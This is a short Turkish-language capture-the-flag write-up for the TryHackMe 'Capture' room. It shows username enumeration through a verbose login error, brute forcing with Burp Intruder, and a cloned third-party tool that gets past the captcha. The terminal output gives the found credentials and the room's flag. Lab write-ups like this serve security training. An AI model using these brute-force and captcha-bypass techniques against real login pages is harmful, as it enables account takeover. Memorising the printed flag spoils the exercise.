Capture

Posted Mar 27, 2024

By Umut Sağlam 2 min read

İndirmemiz istenen zip dosyasında passwords ve usernames wordlistleri var. Brute force için bu wordlistleri kullanacağız.

Siteyi ziyaret ettim.

Error mesajı ‘asd’ kullanıcısının olmadığını söylüyor. Bu hata mesajını kullanarak önce username i bulabilirim.

Burp den isteği durdurup intruder’a atıyorum.

Payloads kısmından bize verilen usernames wordlistini seçiyorum ve saldırıyı başlatıyorum.

Sitede Captcha mevcut. Belirli bir istekten sonra “Too many bad login attempts” hatası alıyorum.

İnternette çözümü araştırırken bu oda için oluşturulmuş bir tool gördüm.

Tek yapmamız gereken toolu çalıştırmak.

  
┌──(root㉿kali)-[/opt]
└─# git clone https://github.com/sakibulalikhan/thm-capture.git                                   
Cloning into 'thm-capture'...
remote: Enumerating objects: 25, done.
remote: Counting objects: 100% (25/25), done.
remote: Compressing objects: 100% (23/23), done.
remote: Total 25 (delta 10), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (25/25), 16.32 KiB | 288.00 KiB/s, done.
Resolving deltas: 100% (10/10), done.
                                                                                                    
┌──(root㉿kali)-[/opt]
└─# cd thm-capture                                                                                                   
                                                                                                    
┌──(root㉿kali)-[/opt/thm-capture]
└─# python capture.py -t 10.10.49.141                     

      
▄▄▄█████▓ ██░ ██  ███▄ ▄███▓    ▄████▄   ▄▄▄       ██▓███  ▄▄▄█████▓ █    ██  ██▀███  ▓█████ 
▓  ██▒ ▓▒▓██░ ██▒▓██▒▀█▀ ██▒   ▒██▀ ▀█  ▒████▄    ▓██░  ██▒▓  ██▒ ▓▒ ██  ▓██▒▓██ ▒ ██▒▓█   ▀ 
▒ ▓██░ ▒░▒██▀▀██░▓██    ▓██░   ▒▓█    ▄ ▒██  ▀█▄  ▓██░ ██▓▒▒ ▓██░ ▒░▓██  ▒██░▓██ ░▄█ ▒▒███   
░ ▓██▓ ░ ░▓█ ░██ ▒██    ▒██    ▒▓▓▄ ▄██▒░██▄▄▄▄██ ▒██▄█▓▒ ▒░ ▓██▓ ░ ▓▓█  ░██░▒██▀▀█▄  ▒▓█  ▄ 
  ▒██▒ ░ ░▓█▒░██▓▒██▒   ░██▒   ▒ ▓███▀ ░ ▓█   ▓██▒▒██▒ ░  ░  ▒██▒ ░ ▒▒█████▓ ░██▓ ▒██▒░▒████▒
  ▒ ░░    ▒ ░░▒░▒░ ▒░   ░  ░   ░ ░▒ ▒  ░ ▒▒   ▓▒█░▒▓▒░ ░  ░  ▒ ░░   ░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░░░ ▒░ ░
    ░     ▒ ░▒░ ░░  ░      ░     ░  ▒     ▒   ▒▒ ░░▒ ░         ░    ░░▒░ ░ ░   ░▒ ░ ▒░ ░ ░  ░
  ░       ░  ░░ ░░      ░      ░          ░   ▒   ░░         ░       ░░░ ░ ░   ░░   ░    ░   
          ░  ░  ░       ░      ░ ░            ░  ░                     ░        ░        ░  ░
                               ░                                                             

      

****************************************************************

* TryHackMe Room Link: https://tryhackme.com/room/capture      *

* Twitter: https://twitter.com/sakibulalikhan                  *

* Linkedin: https://www.linkedin.com/in/sakibulalikhan         *

****************************************************************


[+] Starting bruteforce with target URL: http://10.10.49.141/login

[+] Starting username brute force...

!!! Username Found: natalie

[+] Starting password brute force...

!!! Password Found: sk8board

!!! Flag: 7df2eabce36f02ca8ed7f237f77ea416

TryHackMe

Easy

This post is licensed under CC BY 4.0 by the author.

Trending Tags